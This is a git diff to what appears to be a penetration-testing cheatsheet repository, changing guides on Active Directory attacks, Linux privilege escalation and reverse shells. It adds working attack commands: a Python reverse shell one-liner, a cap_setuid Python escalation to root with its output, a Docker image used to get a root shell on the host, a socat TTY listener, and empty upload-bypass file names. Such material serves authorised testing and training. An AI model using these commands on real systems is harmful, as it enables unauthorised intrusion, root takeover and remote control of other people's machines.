diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f29af93..d0b24d9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -493,6 +493,10 @@ You need a shell on a user account with a mailbox. python secretsdump.py xxxxxxxxxx -just-dc ``` +Alternatively you can use the Metasploit module + +[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420) + ## Privilege Escalation ### PrivEsc Local Admin - Token Impersonation (RottenPotato) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 96108d5..f600d49 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -10,6 +10,15 @@ - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) +## Summary + +* [Checklist](#checklist) +* [SUID](#suid) +* [Capabilities](#capabilities) +* [SUDO](#sudo) +* [Groups](#groups) + * [Docker](#docker) + ## Checklists * Kernel and distribution release details @@ -111,7 +120,7 @@ sudo chmod +s /tmp/suid # setuid bit ``` -## Capabilies +## Capabilities List capabilities of binaries ```bash @@ -126,12 +135,29 @@ List capabilities of binaries /usr/bin/rcp = cap_net_bind_service+ep ``` -Edit capabilites +Edit capabilities ```powershell /sbin/setcap -r /bin/ping # remove setcap cap_net_raw+p /bin/ping # add ``` +Interesting capabilities + +```powershell +cap_dac_read_search # read anything +cap_setuid+ep # setuid +``` + +Example of privilege escalation with `cap_setuid+ep` + +```powershell +$ sudo setcap cap_setuid+ep /usr/bin/python2.7 + +$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' +sh-5.0# id +uid=0(root) gid=1000(swissky) +``` + ## SUDO Sudo configuration might allow a user to execute some command with another user privileges without knowing the password. @@ -178,7 +204,30 @@ $> docker run -it --rm -v $PWD:/mnt bash $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd ``` +Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell + +```powershell +$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease +latest: Pulling from chrisfosterelli/rootplease +2de59b831a23: Pull complete +354c3661655e: Pull complete +91930878a2d7: Pull complete +a3ed95caeb02: Pull complete +489b110c54dc: Pull complete +Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0 +Status: Downloaded newer image for chrisfosterelli/rootplease:latest + +You should now have a root shell on the host OS +Press Ctrl-D to exit the docker instance / shell + +sh-5.0# id +uid=0(root) gid=0(root) groups=0(root) +``` + + ## References -- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) \ No newline at end of file +- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) +- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) +- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index ec33326..1a95f08 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -36,6 +36,11 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen( Linux only +IPv4 +```python +export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +``` + IPv4 ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' @@ -186,20 +191,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new ## Spawn TTY -```bash -/bin/sh -i -``` - -(From an interpreter) - -```powershell -python -c 'import pty; pty.spawn("/bin/sh")' -perl -e 'exec "/bin/sh";' -perl: exec "/bin/sh"; -ruby: exec "/bin/sh" -lua: os.execute('/bin/sh') -``` - Access shortcuts, su, nano and autocomplete in a partially tty shell /!\ OhMyZSH might break this trick, a simple `sh` is recommended @@ -216,19 +207,24 @@ export TERM=xterm-256color stty rows columns ``` -(From within vi) +or use `socat` binary to get a fully tty reverse shell ```bash -:!bash -:set shell=/bin/bash:shell +socat file:`tty`,raw,echo=0 tcp-listen:12345 ``` -(From within nmap) +Spawn a TTY shell from an interpreter -```sh -!sh +```powershell +/bin/sh -i +python -c 'import pty; pty.spawn("/bin/sh")' +perl -e 'exec "/bin/sh";' +perl: exec "/bin/sh"; +ruby: exec "/bin/sh" +lua: os.execute('/bin/sh') ``` + ## References * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) diff --git a/Upload insecure files/Extension PHP/shell.gif?shell.php b/Upload insecure files/Extension PHP/shell.gif?shell.php new file mode 100644 index 0000000..b1c546e --- /dev/null +++ b/Upload insecure files/Extension PHP/shell.gif?shell.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/Extension PHP/shell.jpg?shell.php b/Upload insecure files/Extension PHP/shell.jpg?shell.php new file mode 100644 index 0000000..b1c546e --- /dev/null +++ b/Upload insecure files/Extension PHP/shell.jpg?shell.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/Extension PHP/shell.png?shell.php b/Upload insecure files/Extension PHP/shell.png?shell.php new file mode 100644 index 0000000..b1c546e --- /dev/null +++ b/Upload insecure files/Extension PHP/shell.png?shell.php @@ -0,0 +1 @@ +